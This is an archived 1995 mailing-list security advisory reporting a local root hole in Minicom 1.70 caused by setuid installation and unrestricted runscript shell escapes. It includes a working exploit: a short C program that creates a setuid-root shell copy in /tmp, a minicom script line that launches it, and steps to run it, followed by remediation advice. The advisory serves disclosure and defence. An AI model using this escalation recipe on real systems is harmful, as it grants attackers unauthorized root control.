[362] in linux-security and linux-alert archive
Minicom 1.70
daemon@ATHENA.MIT.EDU (Aleph One)
Fri Sep 15 21:08:53 1995
Date: Fri, 15 Sep 1995 13:05:09 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
To: linux-alert@tarsier.cv.nrao.edu
Reply-To: linux-security@tarsier.cv.nrao.edu
Program: Minicom 1.70.
Problem: Minicom users defined in its minicom.users file can gain root access.
Explanation: Some distributions install minicom setuid root so that it
can access callout devices (/dev/cua0, /dev/ttyS0, /dev/modem).
Minicom also allows users to create scripts that can be used
to automate logins, and other tasks. This scripts are interpreted
by runscript(1). runscript(1) allows arbitrary shell escapes.
Minicom forks and exec runscript(1) without calling setreuid(2)
to drop priviledges. Therefore it fallows the user can execute
arbitrary commands with the privilege of minicom.
To complicate matters even more some distributions install
minicom.users file with default user names. In the case of
Slackware this are: gonzo, satan, snake. If you create accounts
with this names on you system you are oppening you self to
a security breach. If you have accounts under those name you might
want to disable them until security is restored. If a users
asks you to change their username to one of those or to create an
account with one of those names DO NOT DO IT!
Exploit: Create a program that sets its real and effective uid to 0,
then executes a shell command such as copying a shell and making it
setuid root. This will do:
#include <stdlib.h>
#include <unistd.h>
void main() {
setreuid(0,0);
system("/bin/cp /bin/sh /tmp/mysh");
system("/bin/chmod 4777 /tmp/mysh");
}
Create a minicom script that will execute our program.
echo '! /tmp/gime' > /tmp/foo
Start minicom and type Control-A then G. Select C and enter
the name for our minicom script (/tmp/foo). Hit return and
execute the script. Exit minicom and you should find a setuid sh
named as /tmp/mysh.
Solution: Upgrade to minicom 1.71. Futhermore minicom should not be suid root.
Minicom should be of the same group as the dialout device (normally
tty, dialout, modem, or uucp), and setguid. On a side note many
distributions have the correct premission in the /dev/cua devices
but not on their equivalent /dev/ttyS devices. This is the case of
debian 0.93. To fix chown root.dialout /dev/ttyS*; chmod o-rwx
/dev/ttyS*. Make sure that this does brake your other serial devices
such as your mouse.
Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint B6 C3 BD 8A 7A 79 03 55 CC 24 F4 01 2B BD 90 3A
